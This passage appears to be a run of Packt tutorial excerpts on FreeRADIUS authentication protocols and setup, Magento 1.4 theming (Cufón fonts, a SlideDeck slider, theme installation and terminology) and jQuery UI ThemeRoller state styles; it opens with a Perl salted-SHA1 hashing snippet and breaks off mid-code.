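# Usage: ./4088_04_ssha.pl <password> <salt>  (the filename is illustrative)
unless (($ARGV[0]) && ($ARGV[1])) {
    print "Please supply a password and salt to create a salted SHA1 hash from.\n";
    exit;
}
my $ctx = Digest::SHA1->new;
$ctx->add($ARGV[0]);   # hash the password...
$ctx->add($ARGV[1]);   # ...followed by the salt
# Store base64(digest . salt) so the server can recover the salt
print encode_base64($ctx->digest . $ARGV[1], '') . "\n";

The resulting value would go into the users file as an SSHA-Password AVP, following the same steps used for SMD5 above.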
FreeRADIUS: Working with Authentication Methods

Packt
08 Sep 2011
6 min read
Authentication is a process where we establish if someone is who he or she claims to be. The most common way is by a unique username and password. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches authentication methods and how they work. Extensible Authentication Protocol (EAP) is covered later in a dedicated article. In this article we shall:

- Discuss the PAP, CHAP, and MS-CHAP authentication protocols
- See when and how authentication is done in FreeRADIUS
- Explore ways to store passwords
- Look at other authentication methods

(For more resources on this subject, see here.)

Authentication protocols

This section will give you background on three common authentication protocols: PAP, CHAP, and MS-CHAP. Each of these protocols involves the supply of a username and password. The radtest program uses the Password Authentication Protocol (PAP) by default when testing authentication. PAP is not the only authentication protocol, but it is probably the most generic and widely used. The next article, on the Extensible Authentication Protocol (EAP), will introduce us to more authentication protocols.

An authentication protocol is typically used on the data link layer that connects the client with the NAS. The network layer will only be established after the authentication is successful. The NAS acts as a broker to forward the requests from the user to the RADIUS server. The data link layer and network layer are layers inside the Open Systems Interconnection model (OSI model). A discussion of this model can be found in almost any book on networking: http://en.wikipedia.org/wiki/OSI_model

PAP

PAP was one of the first protocols used to facilitate the supply of a username and password when making point-to-point connections. With PAP the NAS takes the PAP ID and password and sends them in an Access-Request packet as the User-Name and User-Password. PAP is simpler compared to CHAP and MS-CHAP because the NAS simply hands the RADIUS server a username and password, which are then checked. This username and password come directly from the user through the NAS to the server in a single action.

Although PAP transmits passwords in clear text, using it should not always be frowned upon. The password is only in clear text between the user and the NAS; the user's password will be encrypted when the NAS forwards the request to the RADIUS server. If PAP is used inside a secure tunnel it is as secure as the tunnel. This is similar to when your credit card details are tunnelled inside an HTTPS connection and delivered to a secure web server. HTTPS stands for Hypertext Transfer Protocol Secure and is a web standard that uses Secure Socket Layer/Transport Layer Security (SSL/TLS) to create a secure channel over an insecure network. Once this secure channel is established, we can transfer sensitive data, like credit card details, through it. HTTPS is used daily to secure many millions of transactions over the Internet. A typical captive portal configuration is an example of this kind of setup.

Of the RADIUS AVPs involved in a PAP request, the value of User-Password is encrypted between the NAS and the RADIUS server. Transporting the user's password from the user to the NAS, however, may be a security risk if it can be captured by a third party.

CHAP

CHAP stands for Challenge-Handshake Authentication Protocol and was designed as an improvement to PAP. It prevents you from transmitting a cleartext password. CHAP was created in the days when dial-up modems were popular and concern about PAP's cleartext passwords was high. After a link is established to the NAS, the NAS generates a random challenge and sends it to the user. The user then responds to this challenge by returning a one-way hash calculated on an identifier (sent along with the challenge), the challenge, and the user's password. The user's response is then used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS returns CHAP Success or CHAP Failure to the user.

The NAS can also request at random intervals that the authentication process be repeated by sending a new challenge to the user. This is another reason why CHAP is considered more secure than PAP. One major drawback of CHAP is that although the password is transmitted encrypted, the password source has to be in clear text for FreeRADIUS to perform password verification. The FreeRADIUS FAQ discusses the dangers of transmitting a cleartext password compared to storing all the passwords in clear text on the server.

MS-CHAP

MS-CHAP is a challenge-handshake authentication protocol created by Microsoft. There are two versions, MS-CHAP version 1 and MS-CHAP version 2. The challenge sent by the NAS is identical in format to the standard CHAP challenge packet; this includes an identifier and an arbitrary challenge. The response from the user is also identical in format to the standard CHAP response packet. The only difference is the format of the Value field, which is sub-formatted to contain MS-CHAP-specific fields. One of these fields (NT-Response) contains the username and password in a very specific encrypted format. The reply from the user is used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS returns a Success Packet or Failure Packet to the user.

The RADIUS server is not involved in sending out the challenge. If you sniff the RADIUS traffic between an NAS and a RADIUS server you can confirm that there is only an Access-Request followed by an Access-Accept or Access-Reject; the sending of a challenge to the user, and the receiving of a response from him or her, happens between the NAS and the user. MS-CHAP also has some enhancements that are not part of CHAP, like the user's ability to change his or her password, and the inclusion of more descriptive error messages. The protocol is tightly integrated with the LAN Manager and NT password hashes: FreeRADIUS will convert a user's cleartext password to an LM-Password and an NT-Password in order to determine whether the password hash that came out of the MS-CHAP request is correct.

Although there are known weaknesses in MS-CHAP, it remains widely used and very popular. Never say never: if your current requirement for the RADIUS deployment does not include the use of MS-CHAP, rather cater for the possibility that one day you may use it. The most popular EAP protocol makes use of MS-CHAP, and EAP is crucial in Wi-Fi authentication. Because MS-CHAP is vendor specific, VSAs instead of AVPs are part of the Access-Request between the NAS and the RADIUS server; these are used together with the User-Name AVP. Now that we know more about the authentication protocols, let's see how FreeRADIUS handles them.
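To make the earlier point about the User-Password AVP being encrypted between the NAS and the RADIUS server concrete, here is an illustrative Perl sketch of the password-hiding scheme defined in RFC 2865 section 5.2. This is background material and an assumption on our part, not code from the original article: each 16-octet chunk of the password is XORed with an MD5 pad derived from the shared secret and the previous ciphertext chunk (the Request Authenticator for the first chunk):

use strict;
use Digest::MD5 qw(md5);

sub hide_password {
    my ($password, $secret, $authenticator) = @_;
    # Pad the password with NULs to a multiple of 16 octets
    my $rem = length($password) % 16;
    $password .= "\0" x (16 - $rem) if $rem;
    my ($hidden, $prev) = ('', $authenticator);
    for (my $i = 0; $i < length($password); $i += 16) {
        my $pad = md5($secret . $prev);            # b(i) = MD5(S + c(i-1))
        $prev = substr($password, $i, 16) ^ $pad;  # c(i) = p(i) XOR b(i)
        $hidden .= $prev;
    }
    return $hidden;   # this value travels in the User-Password AVP
}

Only a server that knows the same shared secret can reverse the operation, so anyone sniffing the NAS-to-server leg sees only the hidden value.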
Getting Started with FreeRADIUS

Packt
07 Sep 2011
6 min read
After FreeRADIUS has been installed it needs to be configured for our requirements. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, will help you get familiar with FreeRADIUS. It assumes that you already know the basics of the RADIUS protocol. In this article we shall:

- Perform a basic configuration of FreeRADIUS and test it
- Discover ways of getting help
- Learn the recommended way to configure and test FreeRADIUS
- See how everything fits together with FreeRADIUS

(For more resources on this subject, see here.)

Before you start

This article assumes that you have a clean installation of FreeRADIUS. You will need root access to edit the FreeRADIUS configuration files for the basic configuration and testing.

A simple setup

We start this article by creating a simple setup of FreeRADIUS with the following:

- The localhost defined as an NAS device (RADIUS client)
- Alice defined as a test user

After we have defined the client and the test user, we will use the radtest program to fill the role of a RADIUS client and test the authentication of Alice.

Time for action – configuring FreeRADIUS

FreeRADIUS is set up by modifying configuration files. The location of these files depends on how FreeRADIUS was installed:

- If you have installed the standard FreeRADIUS packages that are provided with the distribution, it will be under /etc/raddb on CentOS and SLES. On Ubuntu it will be under /etc/freeradius.
- If you have built and installed FreeRADIUS from source using the distribution's package management system, it will also be under /etc/raddb on CentOS and SLES, and under /etc/freeradius on Ubuntu.
- If you have compiled and installed FreeRADIUS using configure, make, make install, it will be under /usr/local/etc/raddb.

The following instructions assume that the FreeRADIUS configuration directory is your current working directory:

1. Ensure that you are root in order to be able to edit the configuration files.

2. FreeRADIUS includes a default client called localhost. This client can be used by RADIUS client programs on the localhost to help with troubleshooting and testing. Confirm that the following entry exists in the clients.conf file:

client localhost {
    ipaddr = 127.0.0.1
    secret = testing123
    require_message_authenticator = no
    nastype = other
}

3. Define Alice as a FreeRADIUS test user. Add the following lines at the top of the users file. Make sure the second and third lines are indented by a single tab character:

"alice" Cleartext-Password := "passme"
	Framed-IP-Address = 192.168.1.65,
	Reply-Message = "Hello, %{User-Name}"

4. Start the FreeRADIUS server in debug mode. Make sure that there is no other instance running by shutting it down through the startup script. We assume Ubuntu in this case:

$> sudo su
#> /etc/init.d/freeradius stop
#> freeradius -X

You can also use the more brutal method of kill -9 $(pidof freeradius) or killall freeradius on Ubuntu, and kill -9 $(pidof radiusd) or killall radiusd on CentOS and SLES, if the startup script does not stop FreeRADIUS.

5. Ensure FreeRADIUS has started correctly by confirming that the last line on your screen says the following:

Ready to process requests.

If this did not happen, read through the output of the FreeRADIUS server started in debug mode to see what problem was identified, and its possible location.

6. Authenticate Alice using the following command:

$> radtest alice passme 127.0.0.1 100 testing123

The debug output of FreeRADIUS will show how the Access-Request packet arrives and how the FreeRADIUS server responds to this request. Radtest will also show the response of the FreeRADIUS server:

Sending Access-Request of id 17 to 127.0.0.1 port 1812
    User-Name = "alice"
    User-Password = "passme"
    NAS-IP-Address = 127.0.1.1
    NAS-Port = 100
rad_recv: Access-Accept packet from host 127.0.0.1 port 1812, id=147, length=40
    Framed-IP-Address = 192.168.1.65
    Reply-Message = "Hello, alice"

What just happened?

We have created a test user on the FreeRADIUS server, and used the radtest command as a client to the FreeRADIUS server to test authentication. Let's elaborate on some interesting and important points.

Configuring FreeRADIUS

Configuration of the FreeRADIUS server is logically divided into different files. These files are modified to configure a certain function, component, or module of FreeRADIUS. There is, however, a main configuration file that sources the various sub-files; this file is called radiusd.conf. The default configuration is suitable for most installations, and very few changes are required to make FreeRADIUS useful in your environment.

Clients

Although there are many files inside the FreeRADIUS server configuration directory, only a few require further changes. The clients.conf file is used to define clients to the FreeRADIUS server. Before an NAS can use the FreeRADIUS server it has to be defined as a client on the FreeRADIUS server. Let's look at some points about client definitions.

Sections

A client is defined by a client section. FreeRADIUS uses sections to group and define various things. A section starts with a keyword indicating the section name, followed by enclosing brackets; inside the enclosing brackets are various settings specific to that section. Sections can also be nested. Sometimes the section's keyword is followed by a single word to differentiate between sections of the same type. This allows us to have different client entries in clients.conf, each with a short name to distinguish it from the others. The clients.conf file is not the only place where client sections can be defined, although it is the usual and most logical one; client definitions can even be nested inside a server section.

Client identification

The FreeRADIUS server identifies a client by its IP address. If an unknown client sends a request to the server, the request will be silently ignored.

Shared secret

The client and server are also required to have a shared secret, which is used to encrypt and decrypt certain AVPs. The value of the User-Password AVP is encrypted using this shared secret. When the shared secret differs between the client and the server, the FreeRADIUS server will detect it and warn you when running in debug mode:

Failed to authenticate the user.
WARNING: Unprintable characters in the password. Double-check the shared secret on the server and the NAS!

Message-Authenticator

When defining a client you can enforce the presence of the Message-Authenticator AVP in all the requests. Since we will be using the radtest program, which does not include it, we disable it for localhost by setting require_message_authenticator to no.

Nastype

The nastype is set to other. The value of nastype determines how the checkrad Perl script will behave. Checkrad is used to determine whether a user is already using resources on an NAS. Since localhost has neither this function nor this need, we define it as other.
Common errors

If the server is down, or the packets from radtest cannot reach the server because of a firewall between them, radtest will try three times and then give up with the following message:

radclient: no response from server for ID 133 socket 3

If you run radtest as a normal user, it may complain about not having access to the FreeRADIUS dictionary file, which is required for normal operations. The way to solve this is either to change the permissions on the reported file, or to run radtest as root.
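Before moving on, one note on defining additional clients: adding a real NAS to clients.conf follows exactly the same pattern we used for localhost. The sketch below uses placeholder values (the client name, address, and secret are assumptions you would replace with your own):

client office-ap {
    ipaddr = 192.168.1.1
    secret = aStrongSharedSecret
    require_message_authenticator = no
    nastype = other
}

Remember that the same secret must also be configured on the NAS itself, and that FreeRADIUS identifies the client by its source IP address.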
Magento 1.4 Theming: Making Our Theme Shine

Packt
23 Aug 2011
8 min read
  Magento 1.4 Theming Cookbook: over 40 recipes to create a fully functional, feature rich, customized Magento theme. (For more resources on this subject, see here.)

Looks quite interesting, doesn't it? Let's get started!

Introduction

You will find all the necessary code in the code bundle; however, some JavaScript libraries won't be included. Don't worry, they are very easy to find and download!

Using Cufón to include any font we like in our theme

This technique, which allows us to use any font we like in our site, is quite common these days, and is very, very useful. Years ago, if we wanted to include some uncommon font in our design, we could only do it by using a substitute image. Nowadays, we have many options, such as some PHP extensions, @font-face, Flash (sIFR), and, of course, Cufón. And that last option is the one we are about to use.

Getting ready

If you would like to copy the code instead of writing it, remember you can find all the necessary code in the code bundle in Chapter 5, recipe 1.

How to do it...

Ready to start this first recipe? Let's go:

1. First we have to decide which font to use; this is totally up to you. In this example I'm going to use this one: http://www.dafont.com/aldo.font. It's a free font, and looks very good! Thanks to Sacha Rein. Just download it, or find any other font of your liking.

2. Now we need to use the Cufón generator in order to create the font package. We will go to this URL: http://cufon.shoqolate.com/generate/. On that screen we only have to follow all the instructions and click on the Let's do this button. This will create a file called Aldo_600.font.js, which is the one we will be using in this example.

3. We also need something more: the Cufón library itself. Download it by clicking the Download button; we will get a file called cufon-yui.js. We now have all the necessary tools. It's time to make use of them.

4. First place cufon-yui.js and Aldo_600.font.js inside skin/frontend/default/rafael/js.

5. Now we need to edit our layout file. Open app/design/frontend/default/rafael/layout/page.xml and look for this piece of code:

<action method="addCss"><stylesheet>css/960_24_col.css</stylesheet></action>
<action method="addCss"><stylesheet>css/styles.css</stylesheet></action>

Just below it, add the following:

<action method="addJs"><script>../skin/frontend/default/rafael/js/cufon-yui.js</script></action>
<action method="addJs"><script>../skin/frontend/default/rafael/js/Aldo_600.font.js</script></action>

See, we are adding our two JavaScript files. The path is relative to Magento's root JavaScript folder. With this done, our theme will load these two JS files.

6. Now we are going to make use of them. Open app/design/frontend/default/rafael/template/page/2columns-right.phtml and at the bottom of this file add the following code:

<script type="text/javascript">
    Cufon.replace('h1');
</script>
</body>
</html>

And that's all we need. Check the difference: every h1 tag of our site will now use our Aldo font, or any other font of your liking. The possibilities are endless!

How it works...

This recipe was quite easy, but full of possibilities. We first downloaded the necessary JavaScript files, and then made use of them with Magento's addJs layout tag. Later we were able to use the libraries in our template as in any other HTML file.

SlideDeck content slider

Sometimes our home page is crowded with info, and we still need to place more and more things. A great way of doing so is using sliders, and SlideDeck offers a very configurable one. In this recipe we are going to see how to add it to our Magento theme. You shouldn't miss this recipe!

How to do it...

Making use of the slider in our theme is quite simple:

1. First we need to go to http://www.slidedeck.com/ and download SlideDeck Lite, as we will be using the Lite version in this recipe. Once downloaded we will end up with a file called slidedeck-1.2.1-litewordpress-1.3.6.zip. Unzip it.

2. Go to skin/frontend/default/rafael/css and place the following files in it: slidedeck.skin.css, slidedeck.skin.ie.css, back.png, corner.png, slides.png, spines.png.

3. Next, place the following files in skin/frontend/default/rafael/js: jquery-1.3.2.min.js, slidedeck.jquery.lite.pack.js.

4. Good, now everything is in place. Next, open app/design/frontend/default/rafael/layout/page.xml and look for the following piece of code:

<block type="page/html_head" name="head" as="head">
    <action method="addJs"><script>prototype/prototype.js</script></action>
    <action method="addJs" ifconfig="dev/js/deprecation"><script>prototype/deprecation.js</script></action>
    <action method="addJs"><script>lib/ccard.js</script></action>

Place the jQuery load tag just before the prototype one, so we have no conflict between the libraries:

<block type="page/html_head" name="head" as="head">
    <action method="addJs"><script>../skin/frontend/default/rafael/js/jquery-1.3.2.min.js</script></action>
    <action method="addJs"><script>prototype/prototype.js</script></action>
    <action method="addJs" ifconfig="dev/js/deprecation"><script>prototype/deprecation.js</script></action>

Also add the following code before the closing of the block:

<action method="addCss"><stylesheet>css/slidedeck.skin.css</stylesheet></action>
<action method="addCss"><stylesheet>css/slidedeck.skin.ie.css</stylesheet></action>
<action method="addJs"><script>../skin/frontend/default/rafael/js/slidedeck.jquery.lite.pack.js</script></action>

5. The following steps require us to log in to the administrator panel. Go to http://127.0.0.1/magento/index.php/admin, then to CMS | Pages, and open the home page.

6. Once inside, go to the Content tab and click on Show/Hide editor. Find the following code:

<div class="grid_18">
    <a href="#"><img src="{{skin url='img_products/big_banner.jpg'}}" alt="Big banner" title="Big banner" /></a>
</div><!-- Big banner -->

And replace it with the following:

<div class="grid_18">
    <style type="text/css">
        #slidedeck_frame { width: 610px; height: 300px; }
    </style>
    <div id="slidedeck_frame" class="skin-slidedeck">
        <dl class="slidedeck">
            <dt>Slide 1</dt>
            <dd>Sample slide content</dd>
            <dt>Slide 2</dt>
            <dd>Sample slide content</dd>
        </dl>
    </div>
    <script type="text/javascript">
        jQuery(document).ready(function($) {
            $('.slidedeck').slidedeck();
        });
    </script>
    <!-- Help support SlideDeck! Place this noscript tag on your page when you deploy a SlideDeck to provide a link back! -->
    <noscript>
        <p>Powered By <a href="http://www.slidedeck.com" title="Visit SlideDeck.com">SlideDeck</a></p>
    </noscript>
</div><!-- Big banner -->

7. Save the page and reload the frontend. Our front page should now show a slider. And we are done! Remember you can place any content you want inside these tags:

<dl class="slidedeck">
    <dt>Slide 1</dt>
    <dd>Sample slide content</dd>
    <dt>Slide 2</dt>
    <dd>Sample slide content</dd>
</dl>

How it works...

This recipe is also quite easy. We only need to load the necessary JavaScript files and edit the content of the home page in order to add the necessary code.
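One practical note when running jQuery alongside Magento's bundled Prototype library: if Prototype-based features break after adding jQuery, the usual cause is both libraries claiming the $ shortcut. A common remedy, which is our suggestion rather than a step from the original recipe, is to call jQuery.noConflict() once jQuery has loaded, and keep receiving $ through the ready() callback exactly as the recipe's snippet already does:

<script type="text/javascript">
    // Release the global $ back to Prototype; keep using the jQuery name
    jQuery.noConflict();
    jQuery(document).ready(function($) {
        // Inside this callback, $ safely refers to jQuery again
        $('.slidedeck').slidedeck();
    });
</script>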
Magento: Exploring Themes

Packt
16 Aug 2011
6 min read
  Magento 1.4 Themes Design

Magento terminology

Before you look at Magento themes, it's beneficial to know the difference between what Magento calls interfaces and what Magento calls themes, and the distinguishing factors of websites and stores.

Magento websites and Magento stores

To add to this, the terms websites and stores have a slightly different meaning in Magento than in general use and in other systems. For example, if your business is called M2, you might have three Magento stores (managed through the same installation of Magento) called:

- Blue Store
- Red Store
- Yellow Store

In this case, Magento refers to M2 as the website, and the stores are Blue Store, Red Store, and Yellow Store. Each store then has one or more store views associated with it too. The simplest Magento website consists of a store and a store view (usually of the same name).

A slightly more complex Magento website may have just one store view for each store. This is a useful technique if you want to manage more than one store in the same Magento installation, with each store selling different products (for example, the Blue Store sells blue products and the Yellow Store sells yellow products). If a store were to make use of more than one Magento store view, it might be to present customers with a multilingual website. For example, our Blue Store may have an English, a French, and a Japanese store view associated with it.

Magento interfaces

An interface consists of one or more Magento themes that determine how your stores look and function for your customers. Interfaces can be assigned at two levels in Magento:

- At the website level
- At the store view level

If you assign an interface at the website level of your Magento installation, all stores associated with it inherit the interface. For example, imagine your website is known as M2 in Magento and it contains the three stores called Blue Store, Red Store, and Yellow Store: assigning an interface at the website level (that is, M2) means Blue Store, Red Store, and Yellow Store all inherit this interface. If you assign the interface at the store view level of Magento, then each store view can retain a different interface.

Magento packages

A Magento package typically contains a base theme, which contains all of the templates and other files that Magento needs to run successfully, and a custom theme. Let's take a typical example of a Magento store, M2. This may have two packages: the base package, located in the app/design/frontend/base/ directory, and another package which itself consists of two themes:

- The custom theme's default theme, in the app/design/frontend/our-custom-theme/default/ directory, which acts as a base theme within the package.
- The custom theme itself, which is the non-default theme, in the app/design/frontend/our-custom-theme/custom-theme/ directory.

By default, Magento will look for a required file in the following order:

1. Custom theme directory: app/design/frontend/our-custom-theme/custom-theme/
2. Custom theme's default directory: app/design/frontend/our-custom-theme/default/
3. Base directory: app/design/frontend/base/

Magento themes

A Magento theme fits into the Magento hierarchy in a number of positions: it can act as an interface or as a store view. There's more to discover about Magento themes yet. There are two types of Magento theme: a base theme (this was called a default theme in Magento 1.3) and a non-default theme.

Base theme

A base theme provides all conceivable files that a Magento store requires to run without error, so that non-default themes built to customize a Magento store will not cause errors if a file does not exist within them. The base theme does not contain all of the CSS and images required to style your store, as you'll be doing this with your non-default theme.

Don't change the base package! It is important that you do not edit any files in the base package and that you do not attempt to create a custom theme in the base package, as this will make fully upgrading Magento difficult. Make sure any custom themes you work on are within their own design package; for example, your theme's files should be located at app/design/frontend/your-package-name/default and skin/frontend/your-package-name/default.

Default themes

A default theme in Magento 1.4 changes aspects of your store but does not need to include every file required by Magento as a base theme does; it must just contain at least one file for at least one aspect of a theme (that is, locales, skins, templates, or layout).

Default themes in Magento 1.3

In Magento 1.3, the default theme acted the way the base theme does in Magento 1.4, providing every file that your Magento store required to operate.

Non-default themes

A non-default theme changes aspects of a Magento store but does not need to include every file required by Magento as the base theme does; it must just contain at least one file for at least one aspect of a theme (that is, locales, skins, templates, or layout). In this way, non-default themes are similar to a default theme in Magento. Non-default themes can be used to alter your Magento store for different seasonal events such as Christmas, Easter, Eid, Passover, and other religious festivals, as well as events in your industry's corporate calendar such as annual exhibitions and conferences.

Blocks in Magento

Magento uses blocks to differentiate between the various components of its functionality, with the idea that this makes it easier for Magento developers and Magento theme designers to customize the functionality of Magento and the look and feel of Magento respectively. There are two types of blocks in Magento:

- Content blocks
- Structural blocks

Content blocks

A content block displays the generated XHTML provided by Magento for any given feature. Content blocks are used within Magento structural blocks. Examples of content blocks in Magento include the following:

- The search feature
- Product listings
- The mini cart
- Category listings
- Site navigation links
- Callouts (advertising blocks)

Simply put, content blocks are the what of a Magento theme: they define what type of content appears within any given page or view within Magento.

Structural blocks

In Magento, a structural block exists only to maintain a visual hierarchy to a page. Typical structural blocks in a Magento theme include:

- Header
- Primary area
- Left column
- Right column
- Footer

In a typical layout, content blocks are positioned within these structural blocks.
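To tie the package and theme terminology together, a minimal custom package on disk could look like the sketch below. The names my-package and my-theme are placeholders following the path conventions quoted above, not paths from the original text:

app/design/frontend/my-package/default/            <- the package's default theme
app/design/frontend/my-package/my-theme/layout/    <- layout XML overrides
app/design/frontend/my-package/my-theme/template/  <- .phtml template overrides
skin/frontend/my-package/default/
skin/frontend/my-package/my-theme/css/
skin/frontend/my-package/my-theme/images/

Magento falls back from my-theme to the package's default theme, and finally to the base package, in exactly the lookup order described above.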
Magento 1.4 Theming: Working with Existing Themes

Packt
16 Aug 2011
5 min read
Magento 1.4 Theming Cookbook: over 40 recipes to create a fully functional, feature-rich, customized Magento theme.

Introduction

As we have just noted, this article is going to be more practical. We are going to look at some basic things that will help us modify the appearance of our site, from looking for free templates to installing them and making some small changes. Most of what we cover is quite simple, so this makes a good introduction and helps us establish a solid foundation.

Installing a theme through Magento Connect

We are going to see two ways in which we can install a new Magento theme. The first is through Magento Connect, which involves a number of steps that we will follow in this recipe.

Getting ready

First we need to go to Magento Connect: http://www.magentocommerce.com/magentoconnect. There, search for the theme Magento Classic Theme Free or, alternatively, load this link: http://www.magentocommerce.com/magento-connect/TemplatesMaster/extension/928/magento-classic-theme.

How to do it...

The Magento Classic Theme is the one we are going to use throughout this article. Follow these steps to install it:

1. First we need to log into our www.magentocommerce.com site account. This is a necessary step to get the extension key. The extension key can be found in a box on the extension's page, along with other useful information such as the compatible Magento versions and the price (free in this case). Click on the button labelled Get Extension Key.
2. In the box that appears, accept the license agreement, select the Magento version we are using, and click on Get Extension Key again.
3. Copy the extension key that is displayed, as we are going to use it very soon.

For the next steps we need to go to our Magento installation's Admin area. There, carry out the following instructions:

1. Go to the System menu, then Magento Connect, and finally Magento Connect Manager.
2. The Magento Connect Manager login screen will appear. Here we need to enter the same login details we use for the Magento Admin area.
3. On the next screen, paste the extension key we have just copied.
4. When we click on the Install button, the installation process starts. It takes only a few seconds, and the theme is installed into our site. Fast and easy!

How it works...

We have just selected a theme from the Magento site and installed it into our own Magento installation through the Magento Connect Manager. We can do this as many times as we want, and install as many themes as we need to.

Installing a theme manually

In this recipe we are going to see another method of installing themes into our Magento installation: installing a theme manually. Why is this important? Because we may want to use themes that are not available through Magento Connect, such as themes purchased elsewhere or downloaded from free theme sites.

Getting ready

In order to follow this method we need a downloaded theme. You can get the Magento Classic theme from this link: http://blog.templates-master.com/free-magento-classic-theme/. Once downloaded, we will have a file called f002.classic_1.zip; just unzip it.
Inside we will find several folders:

- graphic source: This folder has all the PSD files necessary to help us modify the theme.
- installation: This folder is where we can find the installation instructions.
- template source 1.3.2: This version of the theme is for Magento 1.3.2.
- template source 1.4.0.1: This version is for Magento 1.4.0.1.
- template source 1.4.1.0: This version is for Magento 1.4.1.0.

Though our Magento version is not 1.4.1.0, we can use that version of the theme without problems. What can we find inside that folder? Another two folders:

- app
- skin

This is the folder structure we should expect from a Magento theme.

How to do it...

Installing a theme is as easy as copying those two folders into our Magento installation, with all their subfolders and files. Our Magento installation already has its own app and skin folders, so the contents of the downloaded theme's folders will combine with the existing ones. No overwriting should occur (we'll sketch this copy step in code at the end of this article). And that's all; we don't need to do anything else.

Selecting the recently installed theme

Good, now we have installed a theme, one way or the other. So, how do we enable it? It's quite easy; we can do it from our site's admin panel.

Getting ready

If you haven't logged into your Magento installation, do it now.

How to do it...

Once we are inside the admin panel of our site, we need to carry out the following steps to select our new theme:

1. Go to the System menu, and then click on Configuration.
2. Look at the General block and select Design.
3. In Current Package Name, we can leave the value as default. In the Themes section, in the Default field, enter the name of the theme, f002 for this example.
4. We are done. Click on the Save Config button and refresh the frontend. You will be able to see the changes.

How it works...

We have just selected the new theme. As promised, it was quite easy, wasn't it? Try it yourself!
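As promised, here is a minimal sketch of the manual copy step from the earlier recipe, written in JavaScript (Node.js) purely for illustration; you would normally just copy the folders with your file manager or FTP client, and both the theme-download folder and the Magento root path below are hypothetical:

```javascript
// Illustrative sketch only: recursively copy the theme's app/ and skin/
// folders into a Magento installation, merging with the existing folders
// and never overwriting a file that is already present.
const fs = require('fs');
const path = require('path');

function mergeCopy(src, dest) {
  fs.mkdirSync(dest, { recursive: true });
  for (const entry of fs.readdirSync(src, { withFileTypes: true })) {
    const from = path.join(src, entry.name);
    const to = path.join(dest, entry.name);
    if (entry.isDirectory()) {
      mergeCopy(from, to);          // descend into subfolders
    } else if (!fs.existsSync(to)) {
      fs.copyFileSync(from, to);    // copy only if not already there
    }
  }
}

// 'theme-download' is a hypothetical unzipped theme folder;
// '/var/www/magento' is a hypothetical Magento root.
for (const dir of ['app', 'skin']) {
  mergeCopy(path.join('theme-download', dir), path.join('/var/www/magento', dir));
}
```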
jQuery UI Themes: States, Cues, Overlays and Shadows

Packt
05 Aug 2011
7 min read
jQuery UI Themes Beginner's Guide: create new themes for your jQuery site with this step-by-step guide.

States

jQuery UI widgets are always in one state or another, and these states play a role in themes: a widget in one state should look different from a widget in another state. These different appearances are controlled by CSS style properties within the theme.

States are especially prevalent in widgets that interact with mouse events. When a user hovers over a widget that listens for these types of events, the widget changes into a hover state. When the mouse leaves the widget, it returns to a default state. Even when nothing is happening with a widget (no events that the widget is interested in are taking place), the widget is in a default state. The default state exists so that widgets have a default appearance to return to. The appearance of these states is entirely controlled through the applied theme. In this section, we'll change the ThemeRoller settings for widget states.

Time for action - setting default state styles

Some widgets that interact with the mouse have a default state applied to them. We can adjust how this state changes the appearance of the widget using ThemeRoller settings:

1. Continuing with our theme design, expand the Clickable: default state section.
2. In the Background color & texture section, click on the texture selector in the middle and select the inset hard texture.
3. In the Background color & texture section, set the background opacity to 65%.
4. Change the Border color setting value to #b0b0b0.
5. Change the Icon color setting value to #555555.

What just happened?

We've just changed the look and feel of the default widget state. We changed the background texture to match that of the header theme settings. Likewise, we changed the background opacity to 65%, also to match the header theme settings. The border color is now slightly darker, which looks better with the new default state background settings. Finally, the icon color was updated to match the default state font color. In the ThemeRoller preview, compare the sample button before and after these changes.

Time for action - setting hover state styles

The same widgets that may be in a default state, for instance a button, may also be in a hover state. Widgets enter a hover state when a user moves the mouse pointer over the widget. We want our user interface to give some kind of visual indication that the user has hovered over something they can click. It's time to give our theme some hover state styles:

1. Continuing with our theme design, expand the Clickable: hover state section.
2. In the Background color & texture section, click on the texture selector in the middle and select the inset hard texture.
3. Change the Border color setting value to #787878.
4. Change the Icon color setting value to #212121.

What just happened?

When we hover over widgets that support the hover state, their appearance is now harmonized with our theme settings. The background texture was updated to match the texture of the default state styles. The border color is now slightly darker, which makes the widget really stand out when the user hovers over it; at the same time, it isn't so dark that it conflicts with the rest of the theme settings. Finally, we updated the icon color to match the font color. In the ThemeRoller preview, compare the sample button before and after the hover state changes.
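For readers curious about what the Clickable sections of ThemeRoller actually target: jQuery UI applies CSS framework classes such as ui-state-default and ui-state-hover to widgets as their state changes. A minimal jQuery sketch of mimicking this on a plain element, assuming a hypothetical element with the ID demo:

```javascript
// A plain element can borrow the themed "clickable" states by toggling the
// same CSS framework classes that jQuery UI widgets manage internally.
$('#demo')
  .addClass('ui-state-default ui-corner-all') // default state styling
  .hover(
    function () { $(this).addClass('ui-state-hover'); },    // enter hover state
    function () { $(this).removeClass('ui-state-hover'); }  // back to default
  );
```

Widgets such as button and tabs do this for you; the theme settings above decide what those classes look like.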
Time for action - setting active state styles

Some jQuery UI widgets, the same widgets that can be in either a default or hover state, can also be in an active state. Widgets become active after a user clicks them; for instance, the currently selected tab in a tabs widget is in an active state. We can control the appearance of active widgets through ThemeRoller:

1. Continuing with our theme design, expand the Clickable: active state section.
2. In the Background color & texture section, change the color setting value on the left to #f9f9f9.
3. In the Background color & texture section, click the texture selector in the middle and select the flat texture.
4. In the Background color & texture section, set the opacity setting value on the right-hand side to 100%.
5. Change the Border color setting value to #808080.
6. Change the Icon color setting value to #212121.

What just happened?

Widgets in the active state will now use our updated theme styles. We've changed the background color to something only marginally darker. The reason is that we are using the highlight soft texture in our content theme settings, which means the color gets lighter toward the top; the color at the top is what we're aiming for in the active state styles. The texture has been changed to flat. Flat textures, unlike the others, have no pattern: they're simply a color. Accordingly, we've changed the background opacity to 100%, because for these theme settings we're only interested in showing the color. The active state border is slightly darker, a visual cue to show that the widget is in fact active. Finally, like other adjustments we've made in our theme, the icon color now mirrors the text color. In the ThemeRoller preview, compare the sample tabs widget before and after the active state changes: the selected tab's border stands out among the other tabs, and the selected tab blends better with the tab content.
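As with the default and hover states, the active state corresponds to a CSS framework class, ui-state-active, which the Clickable: active state settings style. A minimal jQuery sketch, again using a hypothetical #demo element, of toggling it manually:

```javascript
// jQuery UI adds ui-state-active while a widget is pressed or selected;
// removing it returns the element to its previous state styling.
$('#demo')
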